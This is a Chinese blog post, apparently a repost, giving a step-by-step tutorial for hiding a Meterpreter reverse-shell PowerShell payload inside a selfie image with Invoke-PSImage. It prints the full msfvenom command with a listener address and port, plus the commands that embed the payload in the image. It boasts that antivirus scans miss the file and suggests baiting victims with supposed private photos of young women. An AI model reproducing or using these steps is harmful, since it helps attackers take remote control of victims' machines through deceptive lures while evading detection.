運行shell script 文件_利用自拍照反弹shell

3d7f61990e131264799de29d8a41fac8.gif

文章来源:洛米唯熊

0x00:前言

继前面讲到的用(看我如何利用微信反弹shell)之后,引来了很多人的围观。确实,新颖的利用方式。很有利用价值!闲话少说。今天,利用奇思妙想的方法来反弹shell。用一张自拍照。

0x01:过程

利用工具:

https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection  -o /root/luomiweixiong.ps1

a93b8c951e40e5e8b629dd4cefb50e14.png

利用msf生成ps1脚本

二、找一张自拍图

(我这里用我自己的头像)

7d253312a40bf7a8cf7c131e4114578b.png

luomiweixiong.png

放在Invoke-PSImage目录下,方便执行命令的时候找文件

三、两者合并

85895e4de2900d873be6cd0a98fcb42d.png

两者合并

解释:

首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。再执行“Invoke-PSImage -Script .\luomiweixiong.ps1 -Image .\luomiweixiong.png -Out .\luomiwexiong2.png“命令进行两者合并。

第1个解释中的命令解释:导入模块。

第2个解释中的命令分解:luomiweixiong.ps1为msf生成的ps1文件。luomiweixiong.png为原来的头像文件。luomiwexiong2.png为生成后的头像文件。

    949a429b689177eef64c46f7619fce7f.png

生成后的文件会比原来的大。emmm  大重点是  还是显示原来的头像

四、监听

8e0e476d4e2461aecb0337d20d359cc0.png

老生常谈的方式,不会的请出门左转.

百度一下

五、见证奇迹

exploit开始攻击,运行生成后的

"luomiweixiong2.png"文件,查看效果

1eccad5c29404eb1d852f82179727314.png

   是的。没错。获取到会话了

六、查杀

1、本地查杀    2345安全卫士表示没问题

eff4b338d6c95d0408a325daf08223c6.png

2、在线查杀

bf36f86cec40bfcead680abe3f97049c.png

表示没有压力

0x02:后话

其实还可以更加隐蔽的合并两者,并有更好的效果。比如诱人的小姐姐私房自拍照。

1cfb9311adff913a4974d3c00fab20f9.png

cb70a2cd1603462f01d1d09b94b89df5.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值